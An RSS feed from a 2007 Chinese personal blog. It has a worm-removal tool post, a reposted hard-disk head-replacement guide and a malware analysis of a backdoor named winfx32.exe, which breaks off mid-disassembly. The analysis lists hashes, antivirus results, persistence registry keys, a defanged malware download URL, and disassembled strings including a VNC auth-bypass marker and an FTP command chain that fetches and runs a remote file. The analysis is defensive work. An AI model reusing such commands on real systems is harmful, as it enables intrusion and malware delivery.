<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[人去楼空]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[]]></description>
<link>http://hi.baidu.com/renlangliu</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[[搅浆糊]red pig]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/ae576c3e1948063c70cf6ce7.html]]></link>
        <description><![CDATA[
		
		<p>贴图不说话：</p>
<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/e004f8f81370820ad9f9fde6.jpg"></div>
<div forimg="1">
<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/187e7409b201a3ca3bc763e6.jpg">
<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/e096347f4a13d40d28388ae7.jpg">
<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/526ad55c0e058046fbf2c0e7.jpg"></div>
<div forimg="1">
<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/c6cb94d6f4414d2a07088be1.jpg"></div>
</div>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/ae576c3e1948063c70cf6ce7.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-31  18:00</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/ae576c3e1948063c70cf6ce7.html</guid>
</item>

<item>
        <title><![CDATA[[原创]dmecvcm.exe、iywdqdf.exe、kocmbcd.exe、autorun.inf专杀程序]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/25e7ca3365961c42ad4b5f21.html]]></link>
        <description><![CDATA[
		
		<p>那会看了好友<a target="_blank" href="http://hi.baidu.com/ycosxhack">余弦</a>的文章，呵呵，他又写专杀了，看得心里痒痒的，偶脚本不怎么样哈，批处理还会一点，也写了一个拿出来玩玩，不过只试用于XP以上系统平台，见谅一下哈，下载地址；</p>
<p><a href="http://rxuancai.136.tofor.com/showdown.asp?soft_id=25">http://rxuancai.136.tofor.com/showdown.asp?soft_id=25</a></p>
<p>模块；</p>
<p>1、利用taskkill与ifeo交叉结束进程互守，删除病毒文件并作免疫</p>
<p>2、遍历所有分区删除病毒文件以及autorun脚本</p>
<p>3、清除病毒所做的ifeo和病毒注册表项</p>
<p>4、恢复病毒所禁用的服务</p>
<p>余弦的分析地址：<a href="http://hi.baidu.com/ycosxhack/blog/item/c75fe7cafef4c647f21fe78a.html">http://hi.baidu.com/ycosxhack/blog/item/c75fe7cafef4c647f21fe78a.html</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/25e7ca3365961c42ad4b5f21.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-30  22:11</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/25e7ca3365961c42ad4b5f21.html</guid>
</item>

<item>
        <title><![CDATA[[转载]数据恢复硬盘开盘全过程 (图)]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/d5f7c3a234eef8accbefd038.html]]></link>
        <description><![CDATA[
		
		<div><font color="#ff0000"><strong>原文地址未知；如有冒犯请跟帖</strong></font></div>
<div></div>
<div>现在,硬盘的容量越来越大,给我们的工作带来了极大的方便.但是,硬盘的脆弱使得他一旦出现问题.我们又没有及时备份,后果将是带来无法估量的损失.幸好,目前在国内出现的一个新兴行业"<a href="http://www.zxdata.com/" target="_blank"><font color="#000000">数据恢复</font></a>",使得我们遇到数据丢失,病毒破坏,误删除,误ghost,硬件故障...等不幸后可以极大地挽救重要数据,从而减少损失.<br>
今天介绍的是大家最为关心,最为好奇,也很少见到的硬盘开盘更换磁头处理.首先我们要了解一下磁头与盘片的关系,大家都知道,数据是以磁记录方式存储在盘片上的,读取和写入都靠磁头来完成.然而,磁头并不是贴在盘片上读取的,由于磁盘的高速旋转,使得磁头利用“温彻斯特/Winchester”技术悬浮在盘片上.这使得硬盘磁头在使用中几乎是不磨损的,这使得数据存储非常稳定,硬盘寿命也大大增长.但磁头也是非常脆弱的,在硬盘工作状态下,即使是再小的振动,都有可能使磁头受到严重损坏.由于盘片是工作在无尘环境下,所以,我们在处理磁头故障,也就是更换磁头时,都必须在无尘室内完成,而且还要有扎实的基本功,熟练的技巧,才能使成功率大大提高<a href="http://www.zxdata.com/" target="_blank"><font color="#000000">上海数据恢复</font></a>.<br>
现在我们就来边看图片.边了解更换磁头的具体过程<br>
<br>
<br>
<a href="http://www.zxdata.com/jpg/030.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/030.jpg" border="0"></a><br>
<br>
首先,开盘需要特定的条件和工具,无尘环境是必不可少的,其次我们可以从图中看到还需要医用手套,美工刀,尖嘴钳,直头和弯头镊子,螺丝刀(一字和t8)<br>
</div>
<div><a href="http://www.zxdata.com/jpg/031.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/031.jpg" border="0"></a><br>
<br>
这次我们要更换磁头的硬盘是某客户的一个迈拓120g 硬盘,故障情况是工作后不认盘,电机转,有敲头声.首先,我们用美工刀小心地揭开硬盘上的保修标签.<br>
<br>
<a href="http://www.zxdata.com/jpg/032.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/032.jpg" border="0"></a><br>
<br>
接下来当然是拆除top上的所有螺丝,为了工作效率,外面不是要求很高的螺丝,我们可以用电动起子去卸.<br>
<br>
<a href="http://www.zxdata.com/jpg/033.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/033.jpg" border="0"></a><br>
<br>
我们小心的将螺丝放在培养皿里,打开top,我们就可以一览无遗地看到硬盘的内部结构了,我们可以清楚地看到组成硬盘的各个组件,包括底座base,马达moter,磁盘disc,磁头eblk,和已经打开的顶盖top......<br>
<br>
<a href="http://www.zxdata.com/jpg/035.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/035.jpg" border="0"></a><br>
<br>
打开盘腔以后,我们首先要拆除磁头eblk与主板pcba的连接线.这里,我们就不选用电动起子了,改用手工拆除,这样可以大大地降低失误而造成的严重后果,盘片是需要特别保护的,不允许有任何物体掉落在上面.</div>
<div> </div>
<div><a href="http://www.zxdata.com/jpg/036.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/036.jpg" border="0"></a><br>
<br>
接下来我们来拆vcm组件中的钕磁铁,钕磁铁的吸力是非常大的,我们要非常当心,左手用力按住盘腔,右手紧握尖嘴钳,将钕磁铁取下.<br>
<br>
<a href="http://www.zxdata.com/jpg/037.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/037.jpg" border="0"></a><br>
<br>
然后我们需要把磁头从盘片上停靠区移出来,移出盘片,这样才可以将磁头拆下.<br>
<br>
<a href="http://www.zxdata.com/jpg/038.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/038.jpg" border="0"></a><br>
<br>
我们用一字螺丝刀小心地拆下磁头,用左手按住磁头,避免磁头碰到任何东西.<br>
<br>
<a href="http://www.zxdata.com/jpg/039.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/039.jpg" border="0"></a><br>
<br>
小心翼翼地手拿vcm,把坏磁头取下.<br>
</div>
<div><a href="http://www.zxdata.com/jpg/040.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/040.jpg" border="0"></a><br>
<br>
这张图上我们可以清楚的看到,这个120g的迈拓盘有3个磁头,上面两个(并着),下面一个独立的.盘片数目是2片.<br>
<br>
<a href="http://www.zxdata.com/jpg/041.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/041.jpg" border="0"></a><br>
<br>
取下磁头以后,我们找出和坏磁头同一型号的磁头去更换,我们找来事先准备好,存放在培养皿里的备用磁头.<br>
<br>
<a href="http://www.zxdata.com/jpg/042.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/042.jpg" border="0"></a><br>
<br>
小心地将其装在盘腔上,尤其是磁头不能碰到任何东西,因为磁头是非常脆弱的,上面的簧片稍微受到力就会变形,一旦磁头变形,即宣告这个磁头的报废.<br>
<br>
<a href="http://www.zxdata.com/jpg/043.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/043.jpg" border="0"></a><br>
<br>
接下来这个步骤是关键中的关键了,工程师的基本功和经验都体现在这里了,这里失误,将严重损坏新换上的磁头,这个步骤就是磁头上盘片,工程师用镊子将磁头挑开,直至3个磁头全部放到盘片上,当然,磁头数目越多也就意味着难度越大.<br>
<a href="http://www.zxdata.com/jpg/044.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/044.jpg" border="0"></a><br>
<br>
把磁头移到盘片上的磁头停靠区<br>
<br>
<a href="http://www.zxdata.com/jpg/045.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/045.jpg" border="0"></a><br>
<br>
把磁头与pcba的连接线固定好<br>
<br>
<a href="http://www.zxdata.com/jpg/046.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/046.jpg" border="0"></a><br>
<br>
安装vcm组件......<br>
<br>
<a href="http://www.zxdata.com/jpg/047.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/047.jpg" border="0"></a><br>
<br>
ok,我们已经安装好盘腔里面的所有东西了.仔细检查一下就可以关上top了</div>
<div> </div>
<div><a href="http://www.zxdata.com/jpg/048.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/048.jpg" border="0"></a><br>
<br>
最后一步.安装top,上螺丝当然要注意顺序,不要一次上紧,先对角上齐螺丝,然后在对角依次拧紧每个螺丝......<br>
<br>
<a href="http://www.zxdata.com/jpg/049.jpg" target="_blank"><img alt="点击查看全图" src="http://www.zxdata.com/jpg/049.jpg" border="0"></a><br>
<br>
呵呵,一切的努力终于换来了成果,接上pc检测一下,顺便用耳朵听一下,硬盘已经可以正常认盘了,盘片没有问题的话可以直接挂负盘直接复制数据,如果盘片有问题,我们就需要用软件来跳过坏道恢复数据.......<br>
<br>
本文,图片由上海中新数据恢复及<a href="http://www.zxdata.com/" target="_blank"><font color="#000000">raid恢复</font></a>提供<br>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%D3%B2%BC%FE%CE%AC%D0%DE">硬件维修</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/d5f7c3a234eef8accbefd038.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-29  15:23</pubDate>
        <category><![CDATA[硬件维修]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/d5f7c3a234eef8accbefd038.html</guid>
</item>

<item>
        <title><![CDATA[[转载]PE文件结构示意图]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/c0afdd1bcb7f35fbaf5133cf.html]]></link>
        <description><![CDATA[
		
		<div forimg="1"><img border="0" small="0" class="blogimg" src="http://hiphotos.baidu.com/renlangliu/pic/item/f09db244903a9987b2b7dc30.jpg"></div>
<p>图片转载于看雪学院：</p>
<p> </p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%CF%B5%CD%B3%D3%A6%D3%C3">系统应用</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/c0afdd1bcb7f35fbaf5133cf.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-29  10:55</pubDate>
        <category><![CDATA[系统应用]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/c0afdd1bcb7f35fbaf5133cf.html</guid>
</item>

<item>
        <title><![CDATA[[原创]劣性病毒分析报告：winfx32.exe/winnt.bat]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html]]></link>
        <description><![CDATA[
		
		<p><strong>样本来自；<a href="http://bbs.kafan.cn/viewthread.php?tid=90302&amp;extra=page%3D2&amp;page=1">http://bbs.kafan.cn/viewthread.php?tid=90302&amp;extra=page%3D2&amp;page=1</a></strong></p>
<p><strong>病毒名称：</strong>winfx32.exe（PS：就叫做<font color="#ff0000"><strong>超声波</strong></font>吧）</p>
<p><strong>病毒大小：</strong>448,512 字节</p>
<p><strong>加壳方式：</strong>未知</p>
<p><strong>病毒预警：</strong>4级</p>
<p><strong>病毒指纹：</strong></p>
<p>SHA-160&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 697E2D59FA689ECEBFE7CB94AD0E56279B7735CD<br>
MD5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 90ADC603C68C2330D229C73E403025A5<br>
RIPEMD-160&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : 95CE00210ACB1878C3DA6764BB4EFAFC1F9ED36D<br>
CRC-32&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : CB349415</p>
<p><strong>文章作者：</strong>　[G-AVR]孤单每一天</p>
<p><strong>文章地址：<a href="http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html">http://hi.baidu.com/renlangliu/blog/item/d73ed9805484cbd69123d99a.html</a></strong></p>
<p><strong>命名对照：</strong></p>
<p><strong><a href="http://scanner.virus.org">http://scanner.virus.org</a></strong></p>
<p>
<table width="70%" border="0">
<tbody>
    <tr>
        <td>ArcaVir</td>
        <td>1.0.4</td>
        <td>Clean</td>
        <td>2.67871 secs</td>
    </tr>
    <tr>
        <td>avast!</td>
        <td>3.0.0</td>
        <td>Clean</td>
        <td>0.00514603 secs</td>
    </tr>
    <tr>
        <td>AVG Anti Virus</td>
        <td>7.5.47</td>
        <td>Clean</td>
        <td>2.70932 secs</td>
    </tr>
    <tr>
        <td>BitDefender</td>
        <td>7.1</td>
        <td>Backdoor.VB.EV</td>
        <td>4.52359 secs</td>
    </tr>
    <tr>
        <td>CAT QuickHeal</td>
        <td>9.00</td>
        <td>Clean</td>
        <td>4.53888 secs</td>
    </tr>
    <tr>
        <td>ClamAV</td>
        <td>0.90/3311</td>
        <td>Clean</td>
        <td>0.531867 secs</td>
    </tr>
    <tr>
        <td>Dr. Web</td>
        <td>4.33.0</td>
        <td>Clean</td>
        <td>8.43897 secs</td>
    </tr>
    <tr>
        <td>F-PROT</td>
        <td>4.6.7</td>
        <td>Clean</td>
        <td>0.732941 secs</td>
    </tr>
    <tr>
        <td>F-Secure</td>
        <td>1.02</td>
        <td>Backdoor.Win32.Rbot.cmy [AVP]</td>
        <td>0.069514 secs</td>
    </tr>
    <tr>
        <td>H+BEDV AntiVir</td>
        <td>2.1.10-41</td>
        <td>Clean</td>
        <td>5.56607 secs</td>
    </tr>
    <tr>
        <td>McAfee Virusscan</td>
        <td>5.10.0</td>
        <td>New Malware.bx</td>
        <td>1.97413 secs</td>
    </tr>
    <tr>
        <td>NOD32</td>
        <td>2.51.1</td>
        <td>Clean</td>
        <td>2.93163 secs</td>
    </tr>
    <tr>
        <td>Norman Virus Control</td>
        <td>5.70.01</td>
        <td>Clean</td>
        <td>7.61458 secs</td>
    </tr>
    <tr>
        <td>Panda</td>
        <td>9.00.00</td>
        <td>Clean</td>
        <td>1.39275 secs</td>
    </tr>
    <tr>
        <td>Sophos Sweep</td>
        <td>4.17.0</td>
        <td>Clean</td>
        <td>5.45505 secs</td>
    </tr>
    <tr>
        <td>Trend Micro</td>
        <td>8.310-1002</td>
        <td>Clean</td>
        <td>0.020252 secs</td>
    </tr>
    <tr>
        <td>VBA32</td>
        <td>3.12.0</td>
        <td>Clean</td>
        <td>3.28923 secs</td>
    </tr>
    <tr>
        <td>VirusBuster</td>
        <td>1.3.3</td>
        <td>Clean</td>
        <td>2.03353 secs</td>
    </tr>
</tbody>
</table>
</p>
<p><a href="http://www.virustotal.com">http://www.virustotal.com</a></p>
<p>
<table cellspacing="0" cellpadding="0" width="100%" border="0">
<thead>
    <tr>
        <td>Antivirus</td>
        <td>Version</td>
        <td align="center">Update</td>
        <td>Result</td>
    </tr>
</thead>
<tbody>
    <tr>
        <td>AhnLab-V3</td>
        <td>2007.5.29.0</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>AntiVir</td>
        <td>7.4.0.27</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Authentium</td>
        <td>4.93.8</td>
        <td align="center">05.23.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Avast</td>
        <td>4.7.997.0</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>AVG</td>
        <td>7.5.0.467</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>BitDefender</td>
        <td>7.2</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Backdoor.VB.EV</td>
    </tr>
    <tr>
        <td>CAT-QuickHeal</td>
        <td>9.00</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>ClamAV</td>
        <td>devel-20070416</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>DrWeb</td>
        <td>4.33</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>eSafe</td>
        <td>7.0.15.0</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Win32.Rbot.cmy</td>
    </tr>
    <tr>
        <td>eTrust-Vet</td>
        <td>30.7.3670</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Ewido</td>
        <td>4.0</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>FileAdvisor</td>
        <td>1</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Fortinet</td>
        <td>2.85.0.0</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">suspicious</td>
    </tr>
    <tr>
        <td>F-Prot</td>
        <td>4.3.2.48</td>
        <td align="center">05.25.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>F-Secure</td>
        <td>6.70.13030.0</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Ikarus</td>
        <td>T3.1.1.8</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Backdoor.VB.EV</td>
    </tr>
    <tr>
        <td>Kaspersky</td>
        <td>4.0.2.24</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">Backdoor.Win32.Rbot.cmy</td>
    </tr>
    <tr>
        <td>McAfee</td>
        <td>5040</td>
        <td align="center">05.28.2007</td>
        <td class="positivo">New Malware.bx</td>
    </tr>
    <tr>
        <td>Microsoft</td>
        <td>1.2503</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>NOD32v2</td>
        <td>2293</td>
        <td align="center">05.27.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Norman</td>
        <td>5.80.02</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
    <tr>
        <td>Panda</td>
        <td>9.0.0.4</td>
        <td align="center">05.28.2007 </td>
        <td class="negativo">no virus found</td>
    </tr>
</tbody>
</table>
</p>
<p> </p>
<p><strong>测试环境：winXPSP2 实机</strong></p>
<p> </p>
<p>病毒运行后拷贝自身到%systemroot%\system32\目录下，添加注册表启动项实现自启动，病毒运行中试图操作键盘。</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</p>
<p>名称：Windows Service Agent</p>
<p>类型：REG_SZ　winfx32.exe</p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices</p>
<p><strong>连接：</strong>hxxp://alzahaby.com/vip/vrx6.exe下载其他病毒程序</p>
<p><strong>病毒尝试用自身的端口扫描程序来扫描局域网端口，</strong></p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/d5bb5016670af14f20a4e90a.jpg"></div>
<div forimg="1"><strong>使用net send命令发送恶意消息</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/91647860171a3941ebf8f80b.jpg"></div>
<div forimg="1"><strong>接受命令发动DDOS攻击</strong></div>
<div forimg="1">
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/renlangliu/pic/item/f7128b226323b2f6d7cae217.jpg"></div>
<div forimg="1"><strong>使用FTP命令下载文件</strong></div>
<div forimg="1">___:00433EA8 s_VncD_DSS-Auth db 'VNC%d.%d %s: %s - [AuthBypass]',0<br>
___:00433EA8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: ___:0040EDF6 o<br>
___:00433EC7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00433EC8 s_Rfb03d_03d&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: ___:0040EC83 o<br>
___:00433ED7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00433ED8 word_433ED8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dw 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: ___:0040EBFA r<br>
___:00433ED8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_41B4FC+24 r<br>
___:00433ED8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; ___:0041B656 r<br>
___:00433EDA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
___:00433EDC ; char s_Cmd_exe[]<br>
___:00433EDC s_Cmd_exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'cmd.exe',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: ___:0040F01D o<br>
___:00433EDC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_41A153+21 o<br>
___:00433EE4 s_EchoOpenSD&gt;&gt;O db 'echo open %s %d &gt;&gt; o&amp;echo user 1 &gt;&gt;o &amp;echo 1 &gt;&gt;o &amp;echo get %s &gt;&gt;o &amp;echo bye &gt;&gt;o &amp;ftp -n -s'<br>
___:00433EE4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: ___:0040F317 o<br>
